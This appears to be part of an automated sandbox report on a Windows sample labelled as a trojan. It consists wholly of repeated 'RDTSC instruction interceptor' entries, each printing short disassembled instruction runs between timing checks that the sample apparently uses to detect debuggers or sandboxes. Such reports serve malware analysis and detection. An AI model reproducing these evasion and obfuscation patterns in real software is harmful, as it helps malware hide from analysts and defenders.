Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B4CFBE second address: B4CFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B52508 second address: B5250D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56C5C second address: B56C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56C63 second address: B56C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56DF7 second address: B56DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56DFD second address: B56E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FABC90CD756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F72 second address: B56F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC9471C26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F7E second address: B56F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F83 second address: B56F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FABC9471C26h 0x00000009 jnp 00007FABC9471C26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F94 second address: B56F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AE3775 second address: AE377D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AE377D second address: AE3784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BAC4 second address: B5BAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BAC8 second address: B5BAEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FABC90CD75Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BD85 second address: B5BD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FABC9471C26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BD90 second address: B5BD96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BD96 second address: B5BD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5B50B second address: B5B527 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FABC90CD756h 0x00000009 jmp 00007FABC90CD75Ah 0x0000000e pop ebx 0x0000000f jl 00007FABC90CD75Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4AA second address: B5C4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jbe 00007FABC9471C2Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4BF second address: B5C4C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4C5 second address: B5C4CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4CE second address: B5C4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C7D4 second address: B5C7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C2Dh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30C16 second address: B30C20 instructions: 0x00000000 rdtsc 0x00000002 je 00007FABC90CD75Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D70 second address: B30D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D74 second address: B30D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D7A second address: B30D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D96 second address: B30D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D9F second address: B30DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30DA3 second address: B30DD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FABC90CD75Ah 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FABC90CD75Eh 0x00000017 pop eax 0x00000018 mov edx, edi 0x0000001a call 00007FABC90CD759h 0x0000001f pushad 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30DD8 second address: B30DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FABC9471C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30F4A second address: B30F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FABC90CD763h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30F7C second address: B30F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30F80 second address: B30F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B310BC second address: B310CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FABC9471C2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B310CD second address: B310D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B310D1 second address: B310DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31316 second address: B3131C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3131C second address: B31320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31320 second address: B31324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31324 second address: B3134B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnl 00007FABC9471C2Ch 0x0000000f push 00000004h 0x00000011 mov edx, 04B5A3A5h 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FABC9471C26h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3134B second address: B31351 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31351 second address: B3135B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3135B second address: B3135F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B317D1 second address: B317D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31A6E second address: B31AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007FABC90CD756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FABC90CD758h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+1245AEBFh] 0x00000031 lea eax, dword ptr [ebp+1249552Eh] 0x00000037 mov cx, bx 0x0000003a push eax 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6046F second address: B60480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007FABC9471C26h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B60BE8 second address: B60BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B60BEC second address: B60BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B60BF0 second address: B60C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD75Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B65412 second address: B65430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FABC9471C37h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B65430 second address: B65434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6948A second address: B69496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FABC9471C26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D6F1 second address: B6D6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D6F7 second address: B6D6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D6FD second address: B6D706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D706 second address: B6D718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D862 second address: B6D871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FABC90CD756h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6DB78 second address: B6DB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0EA second address: B6E0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0F0 second address: B6E0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0F5 second address: B6E0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0FB second address: B6E0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0FF second address: B6E109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E109 second address: B6E113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E597 second address: B6E59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E59D second address: B6E5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E5A3 second address: B6E5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E5AC second address: B6E5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D3FF second address: B6D403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D403 second address: B6D422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D422 second address: B6D426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D426 second address: B6D42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B74ACE second address: B74AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FABC90CD766h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B74C5C second address: B74C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC9471C3Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FABC9471C2Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7A52B second address: B7A52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7A67D second address: B7A683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7A683 second address: B7A68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7A68C second address: B7A6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FABC9471C2Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7A6A3 second address: B7A6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7A6A7 second address: B7A6BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FABC9471C32h 0x0000000c je 00007FABC9471C26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B314C3 second address: B314C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B314C7 second address: B314CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B314CB second address: B314D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B314D6 second address: B31598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007FABC9471C2Eh 0x0000000d nop 0x0000000e or edi, 5C4A1A31h 0x00000014 mov ebx, dword ptr [ebp+1249556Dh] 0x0000001a jl 00007FABC9471C2Ch 0x00000020 and edi, dword ptr [ebp+122D1FD6h] 0x00000026 add eax, ebx 0x00000028 add edx, dword ptr [ebp+1245AE38h] 0x0000002e nop 0x0000002f jmp 00007FABC9471C31h 0x00000034 push eax 0x00000035 pushad 0x00000036 jg 00007FABC9471C28h 0x0000003c push ebx 0x0000003d push esi 0x0000003e pop esi 0x0000003f pop ebx 0x00000040 popad 0x00000041 nop 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007FABC9471C28h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c mov dword ptr [ebp+122D1C81h], esi 0x00000062 push 00000004h 0x00000064 jnc 00007FABC9471C2Ah 0x0000006a sub dword ptr [ebp+1245C488h], eax 0x00000070 nop 0x00000071 push ebx 0x00000072 jnc 00007FABC9471C36h 0x00000078 pop ebx 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FABC9471C38h 0x00000081 rdtsc
